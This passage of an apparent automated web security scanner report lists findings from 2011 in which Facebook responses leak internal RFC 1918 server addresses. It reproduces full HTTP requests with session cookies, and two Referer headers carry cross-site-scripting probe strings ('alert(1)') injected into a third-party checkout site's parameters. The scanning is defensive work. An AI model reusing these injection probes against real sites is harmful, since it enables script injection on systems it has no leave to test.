Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:06 GMT
Content-Length: 0


24.209. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d913d8e551ca%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322572de73613e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d0067bc0c9ff4%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20134b7e9921fa%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32a97b5bfa8d2a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=22bf1d%3balert(1)//47ce35f909f&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.169.65
X-Cnection: close
Date: Tue, 19 Jul 2011 19:38:28 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f20134b7e9921fa&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff29ef8a9fad71a&relation=parent&transport=postmessage&frame=f38b9f3d1f4
...[SNIP]...

24.210. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.37.57
X-Cnection: close
Date: Tue, 19 Jul 2011 15:15:26 GMT
Content-Length: 0


24.211. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.103.64
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:54 GMT
Content-Length: 0


24.212. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.34
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0


24.213. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df274ee246b1a0fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27c297e9751724%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e16f3e898bcb8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df235486733f3676%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e23a039157222%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2b263b%27%3balert(1)//2660bb145a6&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.30
X-Cnection: close
Date: Tue, 19 Jul 2011 19:38:09 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f235486733f3676&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff2e5d50ea7ff07&relation=parent&transport=postmessage&frame=f10b886d7c8
...[SNIP]...

24.214. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.42
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:40 GMT
Content-Length: 130477

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

24.215. http://www.facebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Thu, 18 Aug 2011 14:57:17 GMT
X-FB-Server: 10.62.101.47
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:17 GMT
Content-Length: 152

.PNG
.
...IHDR................a..._IDAT8.c...?.%.LXG.8...I.g. U3..m@B.....}...$....,..5...\.h.@~G.?.?...h.\....m.......H....83Q...@..........IEND.B`.

24.216. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...

24.217. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

24.218. http://www.facebook.com/images/contact_importer/login_button/yahoo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/contact_importer/login_button/yahoo.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/contact_importer/login_button/yahoo.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:30 GMT
X-FB-Server: 10.62.85.47
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:30 GMT
Content-Length: 4029

.PNG
.
...IHDR.............!Q.t..
CiCCPICC profile..x..SwX...>..e.VB....l.."#....Y....a...@...
V....HU...
H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p
...[SNIP]...

24.219. http://www.facebook.com/images/loaders/indicator_black.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/loaders/indicator_black.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_black.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Thu, 18 Aug 2011 14:57:56 GMT
X-FB-Server: 10.62.89.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:56 GMT
Content-Length: 1996

GIF89a . ................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...

24.220. http://www.facebook.com/images/registration_graphic.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/registration_graphic.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/registration_graphic.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:15 GMT
X-FB-Server: 10.62.120.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:15 GMT
Content-Length: 1148

.PNG
.
...IHDR...2...2.....).x.....PLTE;Y.j.....:X.......s..:X.Jf.=[.e}.Fc.?]....=Z....@]....bz.......b{.......<Z....f~.9W.C`....?\.Ys....<Z...._x.bz.>\....Ql.r.....>[.j..............<Y.......h.d|.
...[SNIP]...

24.221. http://www.facebook.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.40
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:25 GMT
Content-Length: 0


24.222. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
